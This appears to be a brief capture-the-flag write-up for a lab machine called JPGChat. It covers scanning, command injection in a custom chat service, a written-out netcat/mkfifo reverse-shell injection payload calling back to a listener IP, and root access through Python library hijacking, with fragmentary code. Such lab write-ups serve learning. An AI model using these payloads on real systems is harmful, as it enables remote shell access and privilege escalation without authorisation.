Machine Name: JPGChat
Machine Description: Exploiting poorly made custom chatting service written in a certain language…
Created By: R4v3n
Initial Nmap scan
Port 22 is ssh
Port 3000 is serving JPChat
It might be confusing because the box name is JPGCHAT but the program name is JPChat.
I tried Netcat to the port.
The header shows that the source code is available on GitHub. After searching on GitHub the source code is found at JPChat.
The source code shows that the command injection is available in the program. The payload I used is
Next is to get a reverse shell.
\.';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.10.112 4242 >/tmp/f;'
After the initial foothold,
sudo -l shows that user can execute a python script without password as root.
Here python library hijacking comes to play. I followed this and this.
def __init__(self, *args):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
The gibberish shell was a pain so it’s a better option to transfer the file with the HTTP server.
As soon a the program is executed the reverse shell is opened as root.
Voila!! It has been pwned!
I am not sharing any hashes. It’s a free machine. Please do it and learn.
I am also learning day by day. If there is any mistakes or improvement please share it in the comment.